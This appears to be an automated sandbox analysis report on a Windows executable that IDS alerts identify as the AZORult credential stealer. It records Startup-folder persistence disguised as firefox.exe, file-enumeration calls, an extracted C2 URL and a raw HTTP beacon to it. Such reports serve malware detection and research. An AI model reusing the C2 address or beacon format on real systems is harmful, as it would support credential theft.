Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.7.dr
Source:	Binary string: ucrtbase.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.7.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.7.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.7.dr
Source:	Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: jd4t3R7hOq.exe, 00000003.00000002.2534600317.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, jd4t3R7hOq.exe, 00000003.00000002.2554670589.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2535455098.00000000024F1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.7.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.7.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, jd4t3R7hOq.exe, 00000007.00000002.1433821446.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.7.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr
Source:	Binary string: msvcp140.i386.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.7.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.7.dr
Source:	Binary string: ucrtbase.pdbUGP source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.7.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.7.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.7.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.7.dr
Source:	Binary string: vcruntime140.i386.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.7.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.7.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.7.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.7.dr

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,	7_2_004098A0
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040D0A0 FindFirstFileW,	7_2_0040D0A0
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00414408
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,	7_2_00408D44
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00415610 FindFirstFileW,FindNextFileW,FindClose,	7_2_00415610
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,	7_2_004087DC
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040D06E FindFirstFileW,	7_2_0040D06E
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041303C
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040989F FindFirstFileW,FindNextFileW,FindClose,	7_2_0040989F
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	7_2_004111C4
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00414408
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00415610 FindFirstFileW,FindNextFileW,FindClose,	7_2_00415610
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,	7_2_00408D3C
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041158C
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	7_2_00411590
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D9C

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.11:49726 -> 104.21.75.48:80
Source: Network traffic	Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.11:49726 -> 104.21.75.48:80
Source: Network traffic	Suricata IDS: 2029137 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M2 : 104.21.75.48:80 -> 192.168.2.11:49726
Source: Network traffic	Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.11:49767 -> 104.21.75.48:80
Source: Network traffic	Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.11:49807 -> 104.21.75.48:80
Source: Network traffic	Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.11:49807 -> 104.21.75.48:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://ls14.icu/HK341/index.php

Source: global traffic	TCP traffic: 192.168.2.11:56635 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.11:51879 -> 1.1.1.1:53

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_00418688 GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,

7_2_00418688

Source: global traffic

DNS traffic detected: DNS query: ls14.icu

Source: unknown

HTTP traffic detected: POST /HK341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ls14.icuContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 ec 26 66 96 26 66 9f 42 70 9d 37 70 9d 37 70 9d 3b 14 8b 31 11 ef 26 66 9e 26 66 99 26 66 97 40 70 9d 36 11 8b 30 66 8b 31 11 ea 47 70 9d 37 70 9d 34 70 9d 34 70 9d 31 10 ea Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p41&f&fBp7p7p;1&f&f&f@p60f1Gp7p4p4p1

Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: powershell.exe, 00000005.00000002.1321553619.000000000727A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000008.00000002.2535424632.000002CE500B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: jd4t3R7hOq.exe, jd4t3R7hOq.exe, 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2549394624.0000000003617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json
Source: jd4t3R7hOq.exe, 00000007.00000002.1424878829.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, jd4t3R7hOq.exe, 00000007.00000002.1423629865.000000000156B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.1466966401.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.1466966401.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ls14.icu/HK341/index.php
Source: firefox.exe, 00000011.00000002.1466966401.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ls14.icu/HK341/index.php-mQm(
Source: firefox.exe, 00000011.00000002.1466966401.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ls14.icu/HK341/index.phpP_Ul
Source: firefox.exe, 00000011.00000002.1466966401.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ls14.icu/HK341/index.phpR
Source: jd4t3R7hOq.exe, 00000007.00000002.1423629865.000000000156B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ls14.icu/HK341/index.phpU#
Source: jd4t3R7hOq.exe, 00000007.00000002.1424878829.00000000030C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ls14.icu/HK341/index.phpl
Source: powershell.exe, 00000005.00000002.1320279649.000000000599B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1479196509.000000000595A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000000E.00000002.1461318819.0000000004A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1317553583.0000000004931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1461318819.00000000048F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 0000000E.00000002.1461318819.0000000004A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: mozglue.dll.7.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: http://www.mozilla.com0
Source: powershell.exe, 00000005.00000002.1317553583.0000000004931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1461318819.00000000048F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB_q
Source: powershell.exe, 0000000E.00000002.1479196509.000000000595A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.1479196509.000000000595A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.1479196509.000000000595A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: jd4t3R7hOq.exe, jd4t3R7hOq.exe, 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dotbit.me/a/
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
